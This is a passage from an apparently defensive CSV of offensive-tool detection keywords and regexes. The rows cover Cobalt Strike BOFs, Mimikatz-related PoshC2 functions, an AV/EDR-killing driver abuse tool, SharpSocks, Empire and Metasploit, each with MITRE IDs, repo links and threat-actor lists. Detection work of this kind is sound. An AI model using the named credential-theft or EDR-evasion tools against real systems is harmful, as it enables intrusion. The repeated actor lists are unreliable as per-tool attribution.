Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55498" "*Process_Inject_Struct*",".{0,1000}Process_Inject_Struct.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","55499" "*process_inject_transform_x*",".{0,1000}process_inject_transform_x.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55500" "*process_inject_userwx*",".{0,1000}process_inject_userwx.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 
Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55501" "*process_killer.exe*",".{0,1000}process_killer\.exe.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","55502" 
"*process_memdump.rb*",".{0,1000}process_memdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55503" "*process_mimikatz*",".{0,1000}process_mimikatz.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - 
Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55504" "*process_protection_enum *",".{0,1000}process_protection_enum\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","0","N/A","N/A","10","10","58","10","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z","55505" 
"*process_protection_enum*.dmp*",".{0,1000}process_protection_enum.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","N/A","10","","N/A","","","","55506" "*process_protection_enum.*",".{0,1000}process_protection_enum\..{0,1000}","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. 
limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","N/A","10","10","58","10","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z","55507" "*Process_Protection_Level_BOF.*",".{0,1000}Process_Protection_Level_BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. 
limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","N/A","10","10","58","10","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z","55508" "*Process_Protection_Level_BOF/*",".{0,1000}Process_Protection_Level_BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. 
limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","N/A","10","10","58","10","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z","55509" "*process_snapshot.exe*",".{0,1000}process_snapshot\.exe.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","N/A","4","326","39","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z","55510" "*ProcessCommandChannelImplantMessage*",".{0,1000}ProcessCommandChannelImplantMessage.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","55511" "*ProcessDestroy.x64*",".{0,1000}ProcessDestroy\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 
29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","55512" "*ProcessDestroy.x64.*",".{0,1000}ProcessDestroy\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","55513" 
"*ProcessDestroy.x86*",".{0,1000}ProcessDestroy\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","55514" "*ProcessDestroy.x86.*",".{0,1000}ProcessDestroy\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","55515" "*ProcessEncryptedC2Request*",".{0,1000}ProcessEncryptedC2Request.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","55516" "*ProcessFileZillaFile*",".{0,1000}ProcessFileZillaFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55517" "*ProcessHerpaderping_x64*",".{0,1000}ProcessHerpaderping_x64.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
